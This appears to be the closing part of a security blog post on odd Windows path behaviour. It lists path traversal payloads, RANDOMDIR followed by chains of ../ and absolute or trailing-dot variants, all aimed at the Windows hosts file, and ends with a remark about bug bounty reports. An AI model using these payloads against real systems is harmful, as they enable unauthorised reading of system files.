RANDOMDIR../../../../../../../../../../../../Windows/system32/drivers/etc/hosts
RANDOMDIR../../../../../../../../../../../Windows/system32/drivers/etc/hosts
RANDOMDIR../../../../../../../../../../Windows/system32/drivers/etc/hosts
RANDOMDIR../../../../../../../../../Windows/system32/drivers/etc/hosts
RANDOMDIR../../../../../../../../Windows/system32/drivers/etc/hosts
RANDOMDIR../../../../../../../Windows/system32/drivers/etc/hosts
RANDOMDIR../../../../../../Windows/system32/drivers/etc/hosts
RANDOMDIR../../../../../Windows/system32/drivers/etc/hosts
RANDOMDIR../../../../Windows/system32/drivers/etc/hosts
RANDOMDIR../../../Windows/system32/drivers/etc/hosts
RANDOMDIR../../Windows/system32/drivers/etc/hosts
RANDOMDIR../Windows/system32/drivers/etc/hosts
C:/Windows/system32/drivers/etc/hosts
C:\Windows\system32\drivers\etc\hosts
C:/Windows/system32/drivers/etc/hosts.
C:\Windows\system32\drivers\etc\hosts.
Conclusion
Moral of the story? You can do some crazy shit with paths in Windows!
Eh… And don’t rush to submit your bug bounty reports, I guess ¯\_(ツ)_/¯ ?
This post is licensed under CC BY 4.0 by the author.